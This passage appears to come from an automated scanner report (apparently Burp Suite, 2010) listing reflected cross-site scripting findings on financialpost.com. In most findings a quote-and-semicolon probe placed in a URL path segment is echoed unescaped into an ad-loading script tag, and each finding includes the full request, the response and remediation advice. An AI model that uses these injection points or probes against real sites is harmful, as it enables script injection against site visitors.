p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:58:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43228


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/ajax/email/6e698';8b8919e8594/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=ajax;kw=email;kw=6e698';8b8919e8594;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=94697531?">
...[SNIP]...

1.37. http://www.financialpost.com/blogs/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /blogs/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8274'%3b195d5cfee53 was submitted in the REST URL parameter 1. This input was echoed as b8274';195d5cfee53 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogsb8274'%3b195d5cfee53/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:15:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36261


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/blogsb8274';195d5cfee53/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=blogsb8274';195d5cfee53;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=89788726?">
...[SNIP]...

1.38. http://www.financialpost.com/careers/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /careers/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5338f'%3bc1451072755 was submitted in the REST URL parameter 1. This input was echoed as 5338f';c1451072755 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /careers5338f'%3bc1451072755/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:15:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36303


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careers5338f';c1451072755/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careers5338f';c1451072755;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=17841948?">
...[SNIP]...

1.39. http://www.financialpost.com/careers/Passionate+about+inclusion/3908742/story.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /careers/Passionate+about+inclusion/3908742/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60ebf'%3bee703a43543 was submitted in the REST URL parameter 1. This input was echoed as 60ebf';ee703a43543 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /careers60ebf'%3bee703a43543/Passionate+about+inclusion/3908742/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 81033
Expires: Sun, 19 Dec 2010 03:15:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careers60ebf';ee703a43543/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careers60ebf';ee703a43543;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=31781956?">
...[SNIP]...

1.40. http://www.financialpost.com/careers/Passionate+about+inclusion/3908742/story.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /careers/Passionate+about+inclusion/3908742/story.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17bc9'%3b34da138a151 was submitted in the REST URL parameter 3. This input was echoed as 17bc9';34da138a151 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /careers/Passionate+about+inclusion/390874217bc9'%3b34da138a151/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70051
Expires: Sun, 19 Dec 2010 03:15:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careers/passionate-about-inclusion/390874217bc9';34da138a151/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careers;kw=passionate-about-inclusion;kw=390874217bc9';34da138a151;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=39990
...[SNIP]...

1.41. http://www.financialpost.com/careers/Passionate+about+inclusion/3908742/story.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /careers/Passionate+about+inclusion/3908742/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 29ff7'%3bb3f1c59f563 was submitted in the REST URL parameter 4. This input was echoed as 29ff7';b3f1c59f563 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /careers/Passionate+about+inclusion/3908742/29ff7'%3bb3f1c59f563 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:15:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37230


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careers/passionate%20about%20inclusion/3908742/29ff7';b3f1c59f563/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careers;kw=passionate%20about%20inclusion;kw=3908742;kw=29ff7';b3f1c59f563;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'o
...[SNIP]...

1.42. http://www.financialpost.com/careers/Pink+collar+jobs+spare+women+from+recession/3951473/story.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /careers/Pink+collar+jobs+spare+women+from+recession/3951473/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d5c25'%3b9ab1b8da1c9 was submitted in the REST URL parameter 1. This input was echoed as d5c25';9ab1b8da1c9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /careersd5c25'%3b9ab1b8da1c9/Pink+collar+jobs+spare+women+from+recession/3951473/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 74447
Expires: Sun, 19 Dec 2010 03:15:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careersd5c25';9ab1b8da1c9/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careersd5c25';9ab1b8da1c9;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=70150980?">
...[SNIP]...

1.43. http://www.financialpost.com/careers/Pink+collar+jobs+spare+women+from+recession/3951473/story.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /careers/Pink+collar+jobs+spare+women+from+recession/3951473/story.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb7af'%3b3e6963f564a was submitted in the REST URL parameter 3. This input was echoed as bb7af';3e6963f564a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /careers/Pink+collar+jobs+spare+women+from+recession/3951473bb7af'%3b3e6963f564a/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 63862
Expires: Sun, 19 Dec 2010 03:15:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careers/pink-collar-jobs-spare-women-from-recession/3951473bb7af';3e6963f564a/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careers;kw=pink-collar-jobs-spare-women-from-recession;kw=3951473bb7af';3e6963f564a;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surro
...[SNIP]...

1.44. http://www.financialpost.com/careers/Pink+collar+jobs+spare+women+from+recession/3951473/story.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /careers/Pink+collar+jobs+spare+women+from+recession/3951473/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d42d4'%3b113cc4c7a9f was submitted in the REST URL parameter 4. This input was echoed as d42d4';113cc4c7a9f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /careers/Pink+collar+jobs+spare+women+from+recession/3951473/d42d4'%3b113cc4c7a9f HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:15:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37780


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careers/pink%20collar%20jobs%20spare%20women%20from%20recession/3951473/d42d4';113cc4c7a9f/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careers;kw=pink%20collar%20jobs%20spare%20women%20from%20recession;kw=3951473;kw=d42d4';113cc4c7a9f;kw=npo;kw=fpo;tile='+dartad_tile+';'+a
...[SNIP]...

1.45. http://www.financialpost.com/careers/Rules+keep+work+parties+festive/3978714/story.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /careers/Rules+keep+work+parties+festive/3978714/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 67407'%3b92dac48a721 was submitted in the REST URL parameter 1. This input was echoed as 67407';92dac48a721 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /careers67407'%3b92dac48a721/Rules+keep+work+parties+festive/3978714/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 74402
Expires: Sun, 19 Dec 2010 03:15:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careers67407';92dac48a721/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careers67407';92dac48a721;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=95963968?">
...[SNIP]...

1.46. http://www.financialpost.com/careers/Rules+keep+work+parties+festive/3978714/story.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /careers/Rules+keep+work+parties+festive/3978714/story.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f598'%3b1d4c31151fb was submitted in the REST URL parameter 3. This input was echoed as 5f598';1d4c31151fb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /careers/Rules+keep+work+parties+festive/39787145f598'%3b1d4c31151fb/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 63421
Expires: Sun, 19 Dec 2010 03:15:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careers/rules-keep-work-parties-festive/39787145f598';1d4c31151fb/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careers;kw=rules-keep-work-parties-festive;kw=39787145f598';1d4c31151fb;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=
...[SNIP]...

1.47. http://www.financialpost.com/careers/Rules+keep+work+parties+festive/3978714/story.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /careers/Rules+keep+work+parties+festive/3978714/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71a25'%3b364cbeb8eca was submitted in the REST URL parameter 4. This input was echoed as 71a25';364cbeb8eca in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /careers/Rules+keep+work+parties+festive/3978714/71a25'%3b364cbeb8eca HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:15:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44245


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careers/rules%20keep%20work%20parties%20festive/3978714/71a25';364cbeb8eca/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careers;kw=rules%20keep%20work%20parties%20festive;kw=3978714;kw=71a25';364cbeb8eca;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surro
...[SNIP]...

1.48. http://www.financialpost.com/careers/Texting+lazy+IMHO/3941140/story.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /careers/Texting+lazy+IMHO/3941140/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19264'%3b66fe6c3fb0d was submitted in the REST URL parameter 1. This input was echoed as 19264';66fe6c3fb0d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /careers19264'%3b66fe6c3fb0d/Texting+lazy+IMHO/3941140/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 78645
Expires: Sun, 19 Dec 2010 03:15:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:11 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careers19264';66fe6c3fb0d/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careers19264';66fe6c3fb0d;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=69933413?">
...[SNIP]...

1.49. http://www.financialpost.com/careers/Texting+lazy+IMHO/3941140/story.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /careers/Texting+lazy+IMHO/3941140/story.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26269'%3b7e045e51a09 was submitted in the REST URL parameter 3. This input was echoed as 26269';7e045e51a09 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

